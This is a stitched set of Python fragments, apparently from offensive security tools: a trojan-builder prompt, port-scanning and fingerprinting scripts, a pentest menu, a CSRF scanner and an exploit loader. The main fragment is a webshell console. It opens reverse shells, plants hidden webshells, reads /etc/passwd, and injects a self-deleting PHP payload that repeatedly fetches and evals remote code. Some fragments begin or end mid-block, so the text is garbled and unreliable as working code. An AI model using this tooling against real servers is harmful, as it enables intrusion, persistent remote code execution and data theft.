def main():
    """Interactive prompt: show the banner and help, then read commands
    until ``exit``/``e``.

    ``make``/``m`` builds the trojan, ``h``/``?`` reprints the help text and
    any other input prints a short hint.  Python 2 (``raw_input`` and the
    ``print`` statement).
    """
    banner()
    help()
    while True:
        # Log.console() is called for its side effect; whatever it returns is
        # stringified and then stripped of the characters N/o/n/e, so a None
        # return yields an empty prompt string for raw_input.
        prompt = str(Log.console("asist@AWD: ")).strip('None')
        cmd = raw_input(prompt)
        if cmd in ("make", "m"):
            make_trojan()
        elif cmd in ("h", "?"):
            help()
        elif cmd in ("exit", "e"):
            break
        else:
            print "help(?)"
 def __init__(self):
     """Instantiate the component objects this instance delegates to.

     Each attribute is produced by calling the matching project-level
     factory (``main()``, ``io()``, ...).  Construction order is kept exactly
     as listed, since those constructors may carry side effects of their own.
     """
     # (attribute name, factory) pairs in construction order
     components = (
         ('main', main),
         ('io', io),
         ('tip', tip),
         ('execute', execute),
         ('loader', loader),
         ('config', config),
         ('badges', badges),
         ('banner', banner),
         ('storage', storage),
     )
     for attr_name, factory in components:
         setattr(self, attr_name, factory())
 def __init__(self):
     """Instantiate the component objects this instance delegates to.

     Each attribute is produced by calling the matching project-level
     factory (``io()``, ``tip()``, ...).  Construction order is kept exactly
     as listed, since those constructors may carry side effects of their own.
     """
     # (attribute name, factory) pairs in construction order
     components = (
         ('io', io),
         ('tip', tip),
         ('execute', execute),
         ('loader', loader),
         ('config', config),
         ('badges', badges),
         ('banner', banner),
         ('storage', storage),
         ('modules', modules),
         ('exceptions', exceptions),
     )
     for attr_name, factory in components:
         setattr(self, attr_name, factory())
    def __init__(self):
        """Instantiate the component objects this instance delegates to and
        resolve the history file path.

        Each attribute is produced by calling the matching project-level
        factory (``io()``, ``tip()``, ...), in the order listed.  ``config``
        must be built before ``self.history`` is read from its
        ``path_config['base_paths']['history_path']`` entry.
        """
        # (attribute name, factory) pairs in construction order
        components = (
            ('io', io),
            ('tip', tip),
            ('jobs', jobs),
            ('execute', execute),
            ('loader', loader),
            ('config', config),
            ('badges', badges),
            ('banner', banner),
            ('colors', colors),
            ('local_storage', local_storage),
            ('modules', modules),
            ('exceptions', exceptions),
        )
        for attr_name, factory in components:
            setattr(self, attr_name, factory())

        base_paths = self.config.path_config['base_paths']
        self.history = base_paths['history_path']
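def main():
    """Entry point: choose a subreddit and a category, then fetch image URLs.

    Clears the terminal, prints the banner, validates the subreddit via
    ``check_validity()``, then prompts until a category 1-5 is entered
    (5 exits the process) and hands the choice to ``fetch_choices``.

    Fix: the choice used to be parsed with a bare ``int(input(...))``, so any
    non-numeric entry raised ValueError and killed the program; it is now
    reported as an invalid choice and the prompt repeats.
    """
    # Clear up the terminal screen (fixed command string; no user input
    # reaches the shell here).
    subprocess.call("clear", shell=True)
    print(banner())
    print()

    # Check the validity of user entered subreddit and assign its value to sub
    sub = check_validity()

    # Category menu
    print("""%s[+] Wubba Lubba dub-dub!

    Select a Category:
    1) Top
    2) New
    3) Hot
    4) Rising
    5) Exit
    """ % (green))

    # Loop until valid category is selected
    while True:
        raw_choice = input("%sEnter your choice: %s" % (green, reset))
        print()
        try:
            ch = int(raw_choice)
        except ValueError:
            ch = None  # non-numeric: handled as an invalid choice below
        if ch == 5:
            sys.exit()
        if ch in (1, 2, 3, 4):
            break
        print("%s[-] Invalid input detected please enter a valid input!" %
              (red))
        print()

    # Call function to display image urls fetched for respective sub and category
    fetch_choices(ch, sub)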
    from modules.morse import morse_decode
    from modules.utf import utf_decode
    from modules.nato import convert_nato
    from modules.octal import decode_octal
    from modules.netbios import decode_netbios
    from modules.binary import decode_binary
    from modules.reverse import reverse_string
    from modules.decimal import decode_decimal
    from modules.bacon import decode_bacon
    from modules import cracker

except ModuleNotFoundError:
    message("!", "Please Run 'install.sh'!")
    exit(1)

banner(0.0005)  # presumably a per-character print delay in seconds -- confirm against banner()

while True:
    try:
        CommandComplete()
        cmd = input(red("crypted") + gray(" » "))

        if cmd != "":

            if cmd.split()[0] == "rainbow-crack":
                message("+", "Coming soon...")

            # RAINBOW TABLES
            if cmd.split()[0] == "rainbow-init":
                message("+", "Coming soon...")
                """
def main():
    """Interactive console for driving a remote PHP webshell.

    Usage: ``<url> <method> <password>`` on the command line.  The webshell is
    probed once (``webshell.working``); if it does not answer the process
    exits with status 2.  Everything after that is a read-eval loop over
    short mnemonics (listed by ``main_help()``).

    Security notes (review):
      * Any unrecognised input line is executed as a command: on this host via
        ``os.system`` while ``LOCAL_COMMAND_FLAG`` is True (the default, and
        restored by ``setl``), on the target after ``setr``.  A typo at the
        prompt is therefore a local shell command.
      * The URL, method and webshell password are appended in plaintext to
        ``Webshell.txt`` in the working directory.
      * Database credentials are echoed to the log line on connect.
    Python 2 only (``raw_input``, ``string.lower``, ``string.letters``,
    ``str.encode("base64")``).
    """
    banner()
    if len(sys.argv) != 4:
        show_help()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    # True -> unknown commands run locally; False ('setr') -> on the target.
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)

    # NOTE(review): plaintext credential record, appended on every run and
    # never pruned -- treat Webshell.txt as sensitive.
    Log.info("recording this webshell to the log file...")
    with open("Webshell.txt", "a+") as f:
        log_content = "%s => %s => %s\n" % (url, method, password)
        f.write(log_content)

    main_help()

    while True:
        Log.context("sniper")
        # Empty input defaults to the help command.
        context_fresh = raw_input("=>") or "h"
        # Mnemonics are matched case-insensitively; the raw text is kept for
        # the run-it-as-a-command fallback at the bottom of the chain.
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            # Reverse shell back to this host; the hint is the socat listener
            # to start locally first.  Defaults: our own IP, port 8888.
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" %
                           (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            Log.success(webshell.get_php_version())
        elif context == "kv" or context == "kernel_version":
            Log.success(webshell.get_kernel_version())
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        elif context == "setr":
            # Route the unknown-command fallback to the target.
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            # Route the unknown-command fallback back to this host.
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            # Bulk download driven by a remote `find <path> <args>`; the args
            # string is passed through as typed.
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " %
                             (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!" %
                          (path))
                continue
            if webshell.is_directory(path):
                # Directory: recursive download filtered by a find-style
                # --name pattern (default *.php).
                Log.info(
                    "The target file is a directory, using recursion download..."
                )
                filename_filter = raw_input("Input --name '%s' : " %
                                            ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                #filename = path.split("/")[-1]
                #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                # Log.info("Using root path : [%s] to save!" % (local_path))
                Log.info(
                    "The target file is a single file, starting download...")
                # Remote path is reused as the second argument -- presumably
                # the local destination; confirm against WebShell.download.
                webshell.download(path, path)
        elif context == "ps":
            # Port scan from the target's vantage point; hosts must be CIDR.
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            # Drop a second (hidden, dot-prefixed) webshell.  Default name is
            # 16 random letters; default password is md5(md5(salt+name+salt))
            # using the module-level ``salt``.  NOTE(review): random_string's
            # entropy source is not visible here -- verify it is a CSPRNG if
            # the default password is meant to stay secret.
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            webshell.auto_inject_webshell(filename, password)
        elif context == "aimw":
            # Same defaults as "aiw", but injects the memory-resident variant.
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            webshell.auto_inject_memery_webshell(filename, password)
        elif context == "fr":
            # "Flag reaper": plant a PHP file that unlinks itself on first run
            # and then loops forever fetching http://<ip>:<port>/code.txt and
            # eval()-ing it every 5 seconds.  NOTE(review): the target pulls
            # that URL over plain HTTP, so whoever controls the listener (or
            # the network path to it) controls the target.
            Log.info("Starting flag reaper...")
            webserver_host = raw_input("[IP] (%s) : " %
                                       (get_ip_address())) or get_ip_address()
            # int() raises ValueError on non-numeric input; not caught here.
            webserver_port = int(raw_input("[PORT] (80) : ") or "80")
            filename = ".%s.php" % (random_string(0x10, string.letters))
            file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (
                webserver_host, webserver_port)
            Log.info("Temp memory phpfile : %s" % (file_content))
            Log.info("Encoding phpfile...")
            # Python 2 codec: encode("base64") wraps at 76 chars, hence the
            # newline strip.
            file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (
                file_content.encode("base64").replace("\n", ""))
            Log.info("Final memory phpfile : %s" % (file_content))
            result = webshell.auto_inject_flag_reaper(filename, file_content)
            if result:
                Log.success(
                    "Please check the web server(%s:%d) log to get your flag!"
                    % (webserver_host, webserver_port))
                Log.info("Tips : tail -f /var/log/apache2/access.log")
            else:
                Log.error("Starting flag reaper failed!")
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            # Defaults to 127.0.0.1 / root / root.  NOTE(review): the password
            # is printed in the log line below.
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            Log.info("Creating connection by [%s:%s] to [%s]..." %
                     (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            # Fallback: the *raw* line (original case) is executed as a
            # command.  NOTE(review): with LOCAL_COMMAND_FLAG set this goes
            # straight to os.system on this host -- a mistyped mnemonic
            # becomes a local shell command.
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)
		yaml_name,cookies,HD,fRe,paths,Method,expression,datas,md5_path,md5 = parse.get_yaml("fingerprint/"+y)
		if yaml_name.split("-")[-1] != "md5" and "/" in paths and Method == "get" and fRe == False:
			if eval(expression):
				print("        "+yaml_name + ": "+url)
				wFile(yaml_name + ": "+url)
				if type_F == "first":
					fileL.remove(url)
				if type_F == "second" and sec_flag == False:
					sec_flag = True
				return



if __name__ == '__main__':
	# Runs an empty shell command; on Windows this is a common way to turn on
	# ANSI escape handling in the console -- presumably the intent here.
	os.system('')
	banner.banner()
	# Exactly three arguments are accepted (os + one list flag + its file);
	# anything else prints the usage and exits before argparse sees argv.
	if len(sys.argv) != 4:
		print('\n')
		print("Usage: python3 Frog-Fp.py win/linux -tL urls.txt")
		print("Usage: python3 Frog-Fp.py win/linux -dL ips.txt")
		exit()
	else:
		parser = argparse.ArgumentParser() 
		parser.add_argument('os', help='win/linux')
		parser.add_argument('-tL', help='urls', default='')
		parser.add_argument('-dL', help='domains', default='')
		args = parser.parse_args()

	# Pick the binary file name for the chosen OS (win/linux)
	getsys(args.os)
def handle_options(options: dict) -> None:
    """Act on parsed command-line options.

    Only ``options["version"]`` is handled: when truthy, the banner is printed
    via ``banner.banner()`` and the process terminates through ``exit`` with
    that call's return value as the status.  Raises KeyError when the
    ``"version"`` key is absent.
    """
    wants_version = options["version"]
    if not wants_version:
        return
    exit(banner.banner())
            data = {
                'qbase64': base64.b64encode(query_str),
                'email': self.email,
                'key': self.key,
                'size': size,
                'fields': fields
            }
            req = requests.get(url, params=data, timeout=10)
            return req.json()
        except requests.exceptions.ConnectionError:
            error_msg = {"error": True, "errmsg": "Connect error"}
            return error_msg


if __name__ == '__main__':
    banner()
    ips = []
    fofa = FofaAPI(email, key)
    try:
        result = fofa.get_data(cmd.get("query"), cmd.get("size"),
                               "host,ip,title")
    except:
        logger.INFO("search error!!")
    for host, ip, title in result['results']:
        if cmd.get("cidr"):
            ips.append(ip2cidr(ip))

        logger.INFO("Host: {0} IP: {1} Title: [{2}]".format(host, ip, title) +
                    "  is FOUND!")
        num = num + 1
    if cmd.get("cidr"):
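def main():
    """Read-eval loop for the ``Pentest>>`` prompt.

    Each recognised command dispatches to the matching ``core`` helper and
    then returns to the loop, which re-prompts.  ``exit`` (and Ctrl+C) end
    the process through ``exit()``; an unknown command prints a hint.

    Fix: the original called ``main()`` again after every command, so the
    interpreter stack grew by one frame per command and a long session ended
    in a RecursionError.  The enclosing ``while True`` already re-prompts, so
    the recursive calls are dropped with no change in visible behaviour.
    Python 2 (``raw_input``, ``print`` statement).
    """
    while True:
        try:
            PTF = raw_input("Pentest>> ")
            if PTF == 'use modules/exploits':
                core.menu.exploits()
            elif PTF == 'use modules/scanners':
                core.menu.scan()
            elif PTF == 'use modules/password':
                core.menu.pas1()
            elif PTF == 'use modules/post':
                core.menu.post()
            elif PTF == 'use modules/listener':
                core.menu.listener()
            elif PTF == 'use modules/exploitdb':
                core.menu.exploit_db()
            elif PTF == 'use modules/tools':
                core.menu.tools()
            elif PTF == 'shell':
                core.exploit.commands()
            elif PTF == 'show modules':
                core.help.modules()
            elif PTF == 'ipconfig':
                core.exploit.ip1()
            elif PTF == 'show options':
                core.help.help()
            elif PTF == 'update':
                core.exploit.update()
            elif PTF == 'about':
                core.banner.info()
            elif PTF == 'credits':
                core.banner.credits()
            elif PTF == 'banner':
                # Redraw: clear the screen, then the banner and prompt art.
                clean()
                banner()
                ptf()
            elif PTF == 'clear':
                core.menu.exploit.clean()
            elif PTF == 'exit':
                core.banner.exits()
                exit()
            else:
                print "Wrong Command => ", PTF
                print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
        except(KeyboardInterrupt):
            # Ctrl+C: say goodbye with the original pauses, then terminate.
            print("\n"+R+"[*] (Ctrl + C ) Detected, Trying To Exit ...\n" )
            time.sleep(2)
            print(""+G+"[*] Thank You For Using Pentest Framework =)\n" )
            time.sleep(3)
            exit()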
def Engine():  # lets begin it!

    os.system('clear')  # Clear shit from terminal :p
    banner()  # Print the banner
    banabout()  # The second banner
    web, fld = inputin()  # Take the input
    form1 = testFormx1()  # Get the form 1 ready
    form2 = testFormx2()  # Get the form 2 ready
    # For the cookies that we encounter during requests...
    Cookie0 = http.cookiejar.CookieJar()  # First as User1
    Cookie1 = http.cookiejar.CookieJar()  # Then as User2
    resp1 = build_opener(HTTPCookieProcessor(Cookie0))  # Process cookies
    resp2 = build_opener(HTTPCookieProcessor(Cookie1))  # Process cookies
    actionDone = []  # init to the done stuff
    csrf = ''  # no token initialise / invalid token
    ref_detect = 0x00  # Null Char Flag
    ori_detect = 0x00  # Null Char Flags
    form = Debugger.Form_Debugger()  # init to the form parser+token generator
    bs1 = BeautifulSoup(form1).findAll(
        'form', action=True)[0]  # make sure the stuff works properly
    bs2 = BeautifulSoup(form2).findAll('form', action=True)[0]  # same as above
    init1 = web  # First init
    resp1.open(init1)  # Makes request as User2
    resp2.open(init1)  # Make request as User1

    # Now there are 2 different modes of scanning and crawling here.
    # 1st -> Testing a single endpoint without the --crawl flag.
    # 2nd -> Testing all endpoints with the --crawl flag.
    try:
        # Implementing the first mode. [NO CRAWL]
        if not CRAWL_SITE:
            url = web
            response = Get(url).text
            try:
                verbout(O, 'Trying to parse response...')
                soup = BeautifulSoup(response)  # Parser init
            except HTMLParser.HTMLParseError:
                verbout(R, 'BeautifulSoup Error: ' + url)
            i = 0  # Init user number
            if REFERER_ORIGIN_CHECKS:
                # Referer Based Checks if True...
                verbout(
                    O, 'Checking endpoint request validation via ' +
                    color.GREY + 'Referer' + color.END + ' Checks...')
                if Referer(url):
                    ref_detect = 0x01
                verbout(O, 'Confirming the vulnerability...')
                # We have finished with Referer Based Checks, lets go for Origin Based Ones...
                verbout(
                    O, 'Confirming endpoint request validation via ' +
                    color.GREY + 'Origin' + color.END + ' Checks...')
                if Origin(url):
                    ori_detect = 0x01
            # Now lets get the forms...
            verbout(
                O, 'Retrieving all forms on ' + color.GREY + url + color.END +
                '...')
            for m in Debugger.getAllForms(
                    soup):  # iterating over all forms extracted
                verbout(O, 'Testing form:\n' + color.CYAN)
                formPrettify(m.prettify())
                verbout('', '')
                FORMS_TESTED.append('(i) ' + url + ':\n\n' + m.prettify() +
                                    '\n')
                try:
                    if m['action']:
                        pass
                except KeyError:
                    m['action'] = '/' + url.rsplit('/', 1)[1]
                    ErrorLogger(url, 'No standard form "action".')
                action = Parser.buildAction(
                    url,
                    m['action'])  # get all forms which have 'action' attribute
                if not action in actionDone and action != '':  # if url returned is not a null value nor duplicate...
                    # If form submission is kept to True
                    if FORM_SUBMISSION:
                        try:
                            # NOTE: Slow connections may cause read timeouts which may result in AttributeError
                            # So the idea here is tp make requests pretending to be 3 different users.
                            # Now a series of requests will be targeted against the site with different
                            # identities. Refer to XSRFProbe wiki for more info.
                            #
                            # NOTE: Slow connections may cause read timeouts which may result in AttributeError
                            result, genpoc = form.prepareFormInputs(
                                m)  # prepare inputs as user 1
                            r1 = Post(
                                url, action, result
                            )  # make request with token values generated as user1
                            result, genpoc = form.prepareFormInputs(
                                m)  # prepare inputs as user 2
                            r2 = Post(
                                url, action, result
                            )  # again make request with token values generated as user2
                            # Go for cookie based checks
                            if COOKIE_BASED:
                                Cookie(url, r1)
                            # Go for token based entropy checks...
                            try:
                                if m['name']:
                                    query, token = Entropy(
                                        result, url, r1.headers, m.prettify(),
                                        m['action'], m['name'])
                            except KeyError:
                                query, token = Entropy(result, url, r1.headers,
                                                       m.prettify(),
                                                       m['action'])
                            # Now its time to detect the encoding type (if any) of the Anti-CSRF token.
                            fnd, detct = Encoding(token)
                            if fnd == 0x01 and detct:
                                VulnLogger(
                                    url,
                                    'Token is a string encoded value which can be probably decrypted.',
                                    '[i] Encoding: ' + detct)
                            else:
                                NovulLogger(
                                    url,
                                    'Anti-CSRF token is not a string encoded value.'
                                )
                            # Go for token parameter tamper checks.
                            if (query and token):
                                txor = Tamper(url, action, result, r2.text,
                                              query, token)
                            o2 = resp2.open(
                                url).read()  # make request as user2
                            try:
                                form2 = Debugger.getAllForms(BeautifulSoup(
                                    o2))[i]  # user2 gets his form
                            except IndexError:
                                verbout(R, 'Form Index Error')
                                ErrorLogger(url, 'Form Index Error.')
                                continue  # Making sure program won't end here (dirty fix :( )
                            verbout(GR, 'Preparing form inputs...')
                            contents2, genpoc = form.prepareFormInputs(
                                form2)  # prepare for form 3 as user3
                            r3 = Post(
                                url, action, contents2
                            )  # make request as user3 with user3's form
                            if (POST_BASED) and ((not query) or (txor)):
                                try:
                                    if m['name']:
                                        PostBased(url, r1.text, r2.text,
                                                  r3.text,
                                                  m['action'], result, genpoc,
                                                  m.prettify(), m['name'])
                                except KeyError:
                                    PostBased(url, r1.text, r2.text, r3.text,
                                              m['action'], result, genpoc,
                                              m.prettify())
                            else:
                                print(
                                    color.GREEN +
                                    ' [+] The form was requested with a Anti-CSRF token.'
                                )
                                print(color.GREEN + ' [+] Endpoint ' +
                                      color.BG + ' NOT VULNERABLE ' +
                                      color.END + color.GREEN +
                                      ' to POST-Based CSRF Attacks!')
                                NovulLogger(
                                    url,
                                    'Not vulnerable to POST-Based CSRF Attacks.'
                                )
                        except HTTPError as msg:  # if runtime exception...
                            verbout(R, 'Exception : ' +
                                    msg.__str__())  # again exception :(
                            ErrorLogger(url, msg)
                actionDone.append(action)  # add the stuff done
                i += 1  # Increase user iteration
        else:
            # Implementing the 2nd mode [CRAWLING AND SCANNING].
            verbout(GR, "Initializing crawling and scanning...")
            crawler = Crawler.Handler(init1,
                                      resp1)  # Init to the Crawler handler
            while crawler.noinit():  # Until 0 urls left
                url = next(crawler)  # Go for next!
                print(C + 'Testing :> ' + color.CYAN +
                      url)  # Display what url its crawling
                try:
                    soup = crawler.process(fld)  # Start the parser
                    if not soup:
                        continue  # Making sure not to end the program yet...
                    i = 0  # Set count = 0 (user number 0, which will be subsequently incremented)
                    if REFERER_ORIGIN_CHECKS:
                        # Referer Based Checks if True...
                        verbout(
                            O, 'Checking endpoint request validation via ' +
                            color.GREY + 'Referer' + color.END + ' Checks...')
                        if Referer(url):
                            ref_detect = 0x01
                        verbout(O, 'Confirming the vulnerability...')
                        # We have finished with Referer Based Checks, lets go for Origin Based Ones...
                        verbout(
                            O, 'Confirming endpoint request validation via ' +
                            color.GREY + 'Origin' + color.END + ' Checks...')
                        if Origin(url):
                            ori_detect = 0x01
                    # Now lets get the forms...
                    verbout(
                        O, 'Retrieving all forms on ' + color.GREY + url +
                        color.END + '...')
                    for m in Debugger.getAllForms(
                            soup):  # iterating over all forms extracted
                        FORMS_TESTED.append('(i) ' + url + ':\n\n' +
                                            m.prettify() + '\n')
                        try:
                            if m['action']:
                                pass
                        except KeyError:
                            m['action'] = '/' + url.rsplit('/', 1)[1]
                            ErrorLogger(url, 'No standard "action" attribute.')
                        action = Parser.buildAction(
                            url, m['action']
                        )  # get all forms which have 'action' attribute
                        if not action in actionDone and action != '':  # if url returned is not a null value nor duplicate...
                            # If form submission is kept to True
                            if FORM_SUBMISSION:
                                try:
                                    result, genpoc = form.prepareFormInputs(
                                        m)  # prepare inputs as user 1
                                    r1 = Post(
                                        url, action, result
                                    )  # make request with token values generated as user1
                                    result, genpoc = form.prepareFormInputs(
                                        m)  # prepare inputs as user 2
                                    r2 = Post(
                                        url, action, result
                                    )  # again make request with token values generated as user2
                                    if COOKIE_BASED:
                                        Cookie(url, r1)
                                    # Go for token based entropy checks...
                                    try:
                                        if m['name']:
                                            query, token = Entropy(
                                                result, url, r1.headers,
                                                m.prettify(), m['action'],
                                                m['name'])
                                    except KeyError:
                                        query, token = Entropy(
                                            result, url, r1.headers,
                                            m.prettify(), m['action'])
                                        ErrorLogger(
                                            url, 'No standard form "name".')
                                    # Now its time to detect the encoding type (if any) of the Anti-CSRF token.
                                    fnd, detct = Encoding(token)
                                    if fnd == 0x01 and detct:
                                        VulnLogger(
                                            url,
                                            'String encoded token value. Token might be decrypted.',
                                            '[i] Encoding: ' + detct)
                                    else:
                                        NovulLogger(
                                            url,
                                            'Anti-CSRF token is not a string encoded value.'
                                        )
                                    # Go for token parameter tamper checks.
                                    if (query and token):
                                        txor = Tamper(url, action, result,
                                                      r2.text, query, token)
                                    o2 = resp2.open(
                                        url).read()  # make request as user2
                                    try:
                                        form2 = Debugger.getAllForms(
                                            BeautifulSoup(o2))[
                                                i]  # user2 gets his form
                                    except IndexError:
                                        verbout(R, 'Form Index Error')
                                        ErrorLogger(url, 'Form Index Error.')
                                        continue  # making sure program won't end here (dirty fix :( )
                                    verbout(GR, 'Preparing form inputs...')
                                    contents2, genpoc = form.prepareFormInputs(
                                        form2)  # prepare for form 3 as user3
                                    r3 = Post(
                                        url, action, contents2
                                    )  # make request as user3 with user3's form
                                    if (POST_BASED) and ((query == '') or
                                                         (txor == True)):
                                        try:
                                            if m['name']:
                                                PostBased(
                                                    url, r1.text, r2.text,
                                                    r3.text, m['action'],
                                                    result, genpoc,
                                                    m.prettify(), m['name'])
                                        except KeyError:
                                            PostBased(url, r1.text, r2.text,
                                                      r3.text, m['action'],
                                                      result, genpoc,
                                                      m.prettify())
                                    else:
                                        print(
                                            color.GREEN +
                                            ' [+] The form was requested with a Anti-CSRF token.'
                                        )
                                        print(color.GREEN + ' [+] Endpoint ' +
                                              color.BG + ' NOT VULNERABLE ' +
                                              color.END + color.GREEN +
                                              ' to P0ST-Based CSRF Attacks!')
                                        NovulLogger(
                                            url,
                                            'Not vulnerable to POST-Based CSRF Attacks.'
                                        )
                                except HTTPError as msg:  # if runtime exception...
                                    verbout(
                                        color.RED,
                                        ' [-] Exception : ' + color.END +
                                        msg.__str__())  # again exception :(
                                    ErrorLogger(url, msg)
                        actionDone.append(action)  # add the stuff done
                        i += 1  # Increase user iteration
                except URLError as e:  # if again...
                    verbout(R, 'Exception at : ' + url)  # again exception -_-
                    time.sleep(0.4)
                    verbout(O, 'Moving on...')
                    ErrorLogger(url, e)
                    continue  # make sure it doesn't stop at exceptions
                # This error usually happens when some sites are protected by some load balancer
                # example Cloudflare. These domains return a 403 forbidden response in various
                # contexts. For example when making reverse DNS queries.
                except HTTPError as e:
                    if str(e.code) == '403':
                        verbout(R, 'HTTP Authentication Error!')
                        verbout(R, 'Error Code : ' + O + str(e.code))
                        ErrorLogger(url, e)
                        quit()
        GetLogger(
        )  # The scanning has finished, so now we can log out all the links ;)
        print('\n' + G + "Scan completed!" + '\n')
        Analysis()  # For Post Scan Analysis
    except KeyboardInterrupt as e:  # Incase user wants to exit :') (while crawling)
        verbout(R, 'User Interrupt!')
        time.sleep(1.5)
        Analysis()  # For Post scan Analysis
        print(R + 'Aborted!')  # say goodbye
        ErrorLogger('KeyBoard Interrupt', 'Aborted')
        GetLogger(
        )  # The scanning has interrupted, so now we can log out all the links ;)
        quit()
예제 #13
def main():
    """Interactive console for the exploit-module loader.

    Installs SIGINT/SIGTERM handlers (``signal_handler``), prints the banner,
    then loops reading commands at a ``[<context>]=>`` prompt until
    ``q``/``quit``/``exit``.  Top-level commands: ``h``/``help``/``?``,
    ``version``, ``show`` (list ``./exploit/<vendor>/*.py``) and
    ``use <module>`` (import the module and enter a per-module sub-prompt).
    Anything else is handed to ``os.system`` and run on the local host.

    Python 2 only (``raw_input``, ``print`` statement).  ``signal_handler``,
    ``banner``, ``reset_context``, ``main_help``, ``Log`` and ``color`` are
    defined elsewhere in the file.  Returns nothing.
    """
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    banner()

    # Never changed anywhere in this function, so the fall-through branch at
    # the bottom always runs unrecognised input through the local shell.
    LOCAL_COMMAND_FLAG = True

    CONTEXT = reset_context()
    while True:
        # Empty input (bare Enter) is treated as "help".
        command = (raw_input("[%s]=> " % (color.red(CONTEXT))) or "help")
        if command == "h" or command == "help" or command == "?":
            main_help()
        elif command == "version":
            Log.info("Version: 0.0.1")
        elif command == "show":
            print "%s" % (color.purple("------\t\t------"))
            print "%s" % (color.purple("Vendor\t\tModule"))
            print "%s" % (color.purple("------\t\t------"))
            # Modules are discovered relative to the current working directory,
            # not relative to this file's location.
            exploit_path = "./exploit/"
            vendors = os.listdir(exploit_path)
            for vendor in vendors:
                full_path = exploit_path + vendor
                if os.path.isdir(full_path):
                    # Log.info("%s" % ("-" * 0x20))
                    # Log.info("Vendor: %s" % (vendor))
                    exploit_files = os.listdir(full_path)
                    # Counted, but only reported by the commented-out line below.
                    number = 0
                    for exploit_file in exploit_files:
                        if exploit_file.endswith(
                                ".py") and exploit_file != "__init__.py":
                            # Log.info("%s => exploit.%s.%s" % (exploit_file, vendor, exploit_file.replace(".py", "")))
                            # Vendor names longer than 8 characters get one tab,
                            # shorter ones two, to keep the Module column aligned.
                            if len(vendor) > 8:
                                print "%s" % (color.cyan(
                                    "%s\t%s" %
                                    (vendor, exploit_file.replace(".py", ""))))
                            else:
                                print "%s" % (color.cyan(
                                    "%s\t\t%s" %
                                    (vendor, exploit_file.replace(".py", ""))))
                            number += 1
                    # Log.info("%d exploits" % (number))
        elif command.startswith("use "):
            # The token after "use" is passed verbatim to importlib, so the user
            # types the dotted module path (the commented-out Log line in the
            # "show" branch suggests the exploit.<vendor>.<file> form).
            module_name = command.split(" ")[1]
            Log.info("Loading module: %s" % (module_name))
            try:
                module = importlib.import_module(module_name)
            except Exception as e:
                Log.error(str(e))
                continue
            CONTEXT = module_name
            # NOTE(review): unlike the import above this is not guarded; a module
            # without an Exploit attribute raises AttributeError out of main().
            exploit = module.Exploit()
            exploit.show_info()
            Log.info("%s" % ("-" * 0x40))
            exploit.show_options()
            while True:
                # Module sub-prompt.  "help" here shows the main help, not the
